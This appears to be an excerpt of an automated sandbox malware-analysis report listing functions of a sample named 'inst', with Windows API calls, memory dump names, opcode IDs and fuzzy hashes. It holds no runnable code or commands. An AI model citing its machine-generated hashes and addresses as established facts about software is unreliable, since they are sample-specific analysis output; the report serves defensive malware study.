                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4063778783-0
                                                                                                                                                                      • Opcode ID: c6b4f919c38bfaba6f2f3f0cce9e31c2371d91d6b13792bd6e8033e28407ced4
                                                                                                                                                                      • Instruction ID: e8ab5b2a16bdfaca1e38949bf10f7c6ee5733dc1743e67d1c333aafc37dd2762
                                                                                                                                                                      • Opcode Fuzzy Hash: c6b4f919c38bfaba6f2f3f0cce9e31c2371d91d6b13792bd6e8033e28407ced4
                                                                                                                                                                      • Instruction Fuzzy Hash: 47F030F19116086BCB09DAE8D854AEF77AD9F40254F108B7FA426D6081DE70D6098AD1
                                                                                                                                                                      Function 5F4D7CDE Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 5F4D7D0D
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D7D22
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4063778783-0
                                                                                                                                                                      • Opcode ID: 0d23d395ecfcc7742a0664b48eae990a711b4d431dfdcdf9dd0d63bbe24bcf90
                                                                                                                                                                      • Instruction ID: 6abbf318431e71d736a111de84699a9d22f71b4ea1556e0d2df4dfa1b8c8afd4
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d23d395ecfcc7742a0664b48eae990a711b4d431dfdcdf9dd0d63bbe24bcf90
                                                                                                                                                                      • Instruction Fuzzy Hash: ACE065F15122086BC708DAA8D854A9F77ACAB40654F108B6BA826D10C0DE70D6048AD1
                                                                                                                                                                      Function 0017AA43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 0017AA58
                                                                                                                                                                      • CreateDialogParamW.USER32(00000081,?,Function_0001A96B,?), ref: 0017AA89
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                      • Opcode ID: aeee918fe23e2dcb9abcd5a9264b5a810f69e88948b3919f476a0970b0053c52
                                                                                                                                                                      • Instruction ID: 9bae120537022ec1a03d34f2dbf0b11da5afdad3884dde56fcfd7ba7fdcbf5c6
                                                                                                                                                                      • Opcode Fuzzy Hash: aeee918fe23e2dcb9abcd5a9264b5a810f69e88948b3919f476a0970b0053c52
                                                                                                                                                                      • Instruction Fuzzy Hash: 74E0D832985310BAD614AB64ED0AFDA3B74AF68701F42C815B549610E0FBE05814C7A2
                                                                                                                                                                      Function 001B5894 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 001B58A9
                                                                                                                                                                      • CreateDialogParamW.USER32(000000CA,?,Function_0001A96B,?), ref: 001B58DA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDialogErrorLastParam
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3445605341-0
                                                                                                                                                                      • Opcode ID: 041a32269b287f2aafcde34823ee5a0653b83d37b6b755ed2daa93238df03e17
                                                                                                                                                                      • Instruction ID: 093af2ed180673abec0aa19c8584668dc3cb3ee2db585822e013b06303e149be
                                                                                                                                                                      • Opcode Fuzzy Hash: 041a32269b287f2aafcde34823ee5a0653b83d37b6b755ed2daa93238df03e17
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FE0D831645310FBE7146B64EC0BFD63A65AF29701F428825F949A10E0EBA15410D6A2
                                                                                                                                                                      Function 00177FEB Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00177FFA
                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00178005
                                                                                                                                                                        • Part of subcall function 0016DFB0: __CxxThrowException@8.LIBCMT ref: 0016DFC2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$AllocException@8FreeThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1688122297-0
                                                                                                                                                                      • Opcode ID: 756cf6078412039f9caab194b4307a4c5ecfe285e7bbd03eb0c160aaaf17bfdc
                                                                                                                                                                      • Instruction ID: 5396595d595e5aee2257b6905d2f7e53295f6d13e90370887551f8f98d4916e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 756cf6078412039f9caab194b4307a4c5ecfe285e7bbd03eb0c160aaaf17bfdc
                                                                                                                                                                      • Instruction Fuzzy Hash: B8E086326002119BC7301F2CAC0866EF3F9AFA4771B22881EF494D3101DFB0CC818A51
                                                                                                                                                                      Function 5F4DCEFD Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,5F4FCFA0), ref: 5F4DCF0F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,?,5F4FCFA0), ref: 5F4DCF27
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeleteFileHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2633145722-0
                                                                                                                                                                      • Opcode ID: 7953a87472d0041b9a777044af00a87ea6a213b9977e808b22fd80b099fb2a90
                                                                                                                                                                      • Instruction ID: 15089e2ba33e7e5266327d58e9874f326513eb0e3a43eaecd7c05631a5c56045
                                                                                                                                                                      • Opcode Fuzzy Hash: 7953a87472d0041b9a777044af00a87ea6a213b9977e808b22fd80b099fb2a90
                                                                                                                                                                      • Instruction Fuzzy Hash: 98E0EC73504541EBC6146B28D8589C6FBB9BB81332722471DF1BED36D1E730A86A8AA0
                                                                                                                                                                      Function 001EE9C8 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 001EE9D4
                                                                                                                                                                        • Part of subcall function 001F4E30: __getptd_noexit.LIBCMT ref: 001F4E33
                                                                                                                                                                        • Part of subcall function 001F4E30: __amsg_exit.LIBCMT ref: 001F4E40
                                                                                                                                                                        • Part of subcall function 001EE98B: __IsNonwritableInCurrentImage.LIBCMT ref: 001EE99E
                                                                                                                                                                        • Part of subcall function 001EE98B: __getptd_noexit.LIBCMT ref: 001EE9AE
                                                                                                                                                                        • Part of subcall function 001EE98B: __freeptd.LIBCMT ref: 001EE9B8
                                                                                                                                                                        • Part of subcall function 001EE98B: ExitThread.KERNEL32 ref: 001EE9C1
                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 001EE9F5
                                                                                                                                                                        • Part of subcall function 001FAE94: __getptd_noexit.LIBCMT ref: 001FAE9C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 393088965-0
                                                                                                                                                                      • Opcode ID: e2c17a0e385b7bae7fb46e40597f7025acc2257d955799ed88a52109571e7203
                                                                                                                                                                      • Instruction ID: 5be6c35b938609a2ee070761ab250ef336a03a206cd8326676627dfafecf63ce
                                                                                                                                                                      • Opcode Fuzzy Hash: e2c17a0e385b7bae7fb46e40597f7025acc2257d955799ed88a52109571e7203
                                                                                                                                                                      • Instruction Fuzzy Hash: 89E0ECB5910A04EFDB09ABA1C846E3EB766AF15315F200449F1026B2A3DB799D54DA21
                                                                                                                                                                      Function 0019662B Relevance: 3.0, APIs: 2, Instructions: 15timewindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • KillTimer.USER32(?,00002711), ref: 0019663D
                                                                                                                                                                      • PostMessageW.USER32(?,000009DD,00000000,00000000), ref: 0019664F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KillMessagePostTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3249405171-0
                                                                                                                                                                      • Opcode ID: d318576ac107aef02e8dee7cfbc0c8d3c4542495079c36b0431a75c3375c0af5
                                                                                                                                                                      • Instruction ID: 619a9c4fecbb96dfd842a11fd54fd08d5bfc2548146901a675defbc6ac1e672a
                                                                                                                                                                      • Opcode Fuzzy Hash: d318576ac107aef02e8dee7cfbc0c8d3c4542495079c36b0431a75c3375c0af5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0A731540210BFEB200714ED0EF827B58DB24B00F518427F605A40A0D7709C50C654
                                                                                                                                                                      Function 00196659 Relevance: 3.0, APIs: 2, Instructions: 14windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0019665F
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002), ref: 00196672
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_VisibleWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1820326197-0
                                                                                                                                                                      • Opcode ID: d6932f2e4ba5ddaa7e5f3489c5fe8e6ba247627653712318ac23842e6b20ee53
                                                                                                                                                                      • Instruction ID: 3da8ca2d28436152a5c7f1dd06d767fff66c77a98fb1902055f61eb825e25a9d
                                                                                                                                                                      • Opcode Fuzzy Hash: d6932f2e4ba5ddaa7e5f3489c5fe8e6ba247627653712318ac23842e6b20ee53
                                                                                                                                                                      • Instruction Fuzzy Hash: 83D012329511316BEF101B20AD0EBA369ADDF19751F0788396C5AD10A0FF908C0085E0
                                                                                                                                                                      Function 5F50163F Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEvent.KERNEL32(00000000), ref: 5F5017FB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4201588131-0
                                                                                                                                                                      • Opcode ID: 2f7654085e3875d56a79ffd6125799459a30e3aca2cf832852906edce2887eea
                                                                                                                                                                      • Instruction ID: 276bfd24e62fdcca0d4fa032cec69264bfa5c0c59717476ac9c07ec21fc1215c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f7654085e3875d56a79ffd6125799459a30e3aca2cf832852906edce2887eea
                                                                                                                                                                      • Instruction Fuzzy Hash: C95141B1501705EFCB15BFF0C99089EBBF9BF08310B044A3EE55A92A61DB31E911DB82
                                                                                                                                                                      Function 001AEDC9 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001AEDD0
                                                                                                                                                                        • Part of subcall function 001ABFAE: GdipGetImageHorizontalResolution.GDIPLUS(?,?), ref: 001ABFC1
                                                                                                                                                                        • Part of subcall function 001ABFD3: GdipGetImageVerticalResolution.GDIPLUS(?,?), ref: 001ABFE6
                                                                                                                                                                        • Part of subcall function 001AC0A7: GdipGetPropertySize.GDIPLUS(?,?,?), ref: 001AC0B5
                                                                                                                                                                        • Part of subcall function 001AE07B: __EH_prolog3.LIBCMT ref: 001AE082
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$ImageResolution$H_prolog3H_prolog3_HorizontalPropertySizeVertical
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3577579328-0
                                                                                                                                                                      • Opcode ID: bc48f778cb90b6710d2f5426f747b4d0515c4e1e268f221517aa5297963680a4
                                                                                                                                                                      • Instruction ID: 6c666bb107aa716fbe5c391bc316181fb5ebf5b4dfba32c026837cc988ce0e9c
                                                                                                                                                                      • Opcode Fuzzy Hash: bc48f778cb90b6710d2f5426f747b4d0515c4e1e268f221517aa5297963680a4
                                                                                                                                                                      • Instruction Fuzzy Hash: 04415979D00259EFCF24EFA8D9919AEBBF6EF16310F10452AF512A7241DB30AD85CB50
                                                                                                                                                                      Function 001AEF1E Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      • Opcode ID: 3c1fc08c0208b19e303d8a9d7afd4a0f3e1f5768fd8ed7e4b5ece7d6e2490933
                                                                                                                                                                      • Instruction ID: 26c1be0fb8ff8150e6fe1ce467e0466dd93634493b7ef4c5bb6b2a7311da94eb
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c1fc08c0208b19e303d8a9d7afd4a0f3e1f5768fd8ed7e4b5ece7d6e2490933
                                                                                                                                                                      • Instruction Fuzzy Hash: F5319078A00519EFCF05EFA4D8919BEB7F6FF96340B10401AF4169B292DF309A42CB94
                                                                                                                                                                      Function 001D44E3 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D44EA
                                                                                                                                                                        • Part of subcall function 001D42DE: __EH_prolog3.LIBCMT ref: 001D42FD
                                                                                                                                                                        • Part of subcall function 001D42DE: GetDriveTypeW.KERNEL32(?,0000000C), ref: 001D4327
                                                                                                                                                                        • Part of subcall function 001D2158: __EH_prolog3.LIBCMT ref: 001D2177
                                                                                                                                                                        • Part of subcall function 001D2158: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 001D21BD
                                                                                                                                                                        • Part of subcall function 001D2158: _memset.LIBCMT ref: 001D21DF
                                                                                                                                                                        • Part of subcall function 001D2158: DeviceIoControl.KERNEL32(0017BD49,0004D030,?,00000028,?,00000028,?,00000000), ref: 001D2236
                                                                                                                                                                        • Part of subcall function 001D2158: _memset.LIBCMT ref: 001D226C
                                                                                                                                                                        • Part of subcall function 001D3BFD: __EH_prolog3_catch.LIBCMT ref: 001D3C04
                                                                                                                                                                        • Part of subcall function 001D3BFD: CoCreateInstance.OLE32(0022C868,00000000,00000001,0022C798,?,00000038,001D4568,?,?,?,?,?,0000001C,001CEAD1,?,?), ref: 001D3C22
                                                                                                                                                                        • Part of subcall function 001D3BFD: SysFreeString.OLEAUT32(?), ref: 001D3C71
                                                                                                                                                                        • Part of subcall function 001D3BFD: CoSetProxyBlanket.COMBASE(0017BD49,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D3C88
                                                                                                                                                                        • Part of subcall function 001D3BFD: SysFreeString.OLEAUT32(?), ref: 001D3D26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$CreateFreeString_memset$BlanketControlDeviceDriveFileH_prolog3_catchInstanceProxyType
                                                                                                                                                                      • String ID:
